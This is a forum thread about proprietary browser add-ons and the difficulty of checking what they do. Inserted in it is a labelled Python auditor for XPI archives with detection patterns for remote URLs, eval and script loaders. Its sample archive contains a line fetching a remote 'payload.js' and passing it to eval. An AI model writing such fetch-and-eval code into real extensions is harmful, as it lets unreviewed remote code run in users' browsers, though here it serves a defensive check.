How is it possible for add-ons to be proprietary

General discussion about web technology.
GµårÐïåñ
Lieutenant Colonel
Posts: 3365
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: How is it possible for add-ons to be proprietary

Post by GµårÐïåñ »

rehash wrote:So in conclusion the only way to be sure that by using an add-on you're running only free open software is to check:
  • its license
  • that all files in its XPI are source files and not binary files
  • every last line of its source code, because in one line it can fetch proprietary unknown code and execute it
This is a security and privacy nightmare. Is there any control over add-ons that are offered on addons.mozilla.org and over what they really do? Who checks this and how - for each new version? How can a user know which add-ons are trustworthy?
Pretty much; security is a proactive endeavor, not a passive one. You can either trust that they are legit or do your due diligence; unfortunately, there is not much in between. Theoretically, WebExtensions alleviate this, as they are for all intents and purposes limited to being purely scripted, which should imply that you can't do that anymore, but you can theoretically still import external scripts, so there is that. There are, I am sure, script analyzers you can dump the code into to get a breakdown of what's in there and expedite analysis a bit, but again that's a matter of dealer's choice (meaning what works for you to feel comfortable with something); no one can really tell you how to approach your own peace of mind.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
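
A first-pass check of the three points listed in the quoted post above (license file, non-source files in the XPI, lines that pull in or build code at run time), as an added example that is not part of the original thread. The function names, the pattern list and the in-memory sample archive are assumptions constructed for illustration; a hit is a prompt for manual review, not a verdict.

```python
import io
import re
import zipfile

SCRIPT_EXT = (".js", ".jsm", ".html", ".htm", ".xul")  # files scanned line by line
# Heuristics (assumed list, not exhaustive) for code loaded or built at run time.
DYNAMIC_CODE = [
    ("remote URL", re.compile(r"https?://[^\s\"'<>)]+")),
    ("eval/Function", re.compile(r"\b(?:eval|Function)\s*\(")),
    ("script loader", re.compile(r"\b(?:importScripts|loadSubScript)\s*\(")),
]

def looks_binary(data):
    """Treat a file as non-source if it has a NUL byte or is not valid UTF-8."""
    if b"\0" in data:
        return True
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False

def audit_xpi(xpi_bytes):
    """Return license files, binary files and suspicious script lines in an XPI."""
    report = {"license": [], "binary": [], "dynamic": []}
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as xpi:  # an XPI is a ZIP archive
        for info in xpi.infolist():
            if info.is_dir():
                continue
            name, data = info.filename, xpi.read(info)
            base = name.rsplit("/", 1)[-1].lower()
            if base.startswith(("license", "copying")):
                report["license"].append(name)
            if looks_binary(data):
                report["binary"].append(name)
            elif base.endswith(SCRIPT_EXT):
                for lineno, line in enumerate(data.decode("utf-8").splitlines(), 1):
                    for label, rx in DYNAMIC_CODE:
                        if rx.search(line):
                            report["dynamic"].append((name, lineno, label))
    return report

def build_sample_xpi():
    """Constructed sample archive built in memory; not a real extension."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("LICENSE", "GPL-3.0-or-later\n")
        z.writestr("manifest.json", '{"name": "sample", "version": "1.0"}')
        z.writestr("background.js", "var x = 1;\nfetch('https://example.invalid/"
                   "payload.js').then(r => r.text()).then(t => eval(t));\n")
        z.writestr("lib/helper.dll", b"MZ\x90\x00\x03\x00\x00\x00")
    return buf.getvalue()

if __name__ == "__main__":
    print(audit_xpi(build_sample_xpi()))
```

An empty `license` list or any entry under `binary` or `dynamic` marks where the line-by-line reading should start.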
rehash
Posts: 7
Joined: Sat Feb 17, 2018 11:05 am

Re: How is it possible for add-ons to be proprietary

Post by rehash »

Have there been lots of known cases of malicious add-ons in the past? Giorgio wrote that a pre-WebExtensions add-on could easily send your disk contents to a remote server https://hackademix.net/2017/12/11/noscr ... ermission/. Would the add-on community even be likely to discover something like that if the add-on was clever and stealthy?
Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
GµårÐïåñ
Lieutenant Colonel
Posts: 3365
Joined: Fri Mar 20, 2009 5:19 am
Location: PST - USA

Re: How is it possible for add-ons to be proprietary

Post by GµårÐïåñ »

If there is sufficient community involvement and code review around it, then yes.
~.:[ Lï£ê ï§ å Lêmðñ åñÐ Ì Wåñ† M¥ Mðñê¥ ßå¢k ]:.~
________________ .: [ Major Mike's ] :. ________________
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0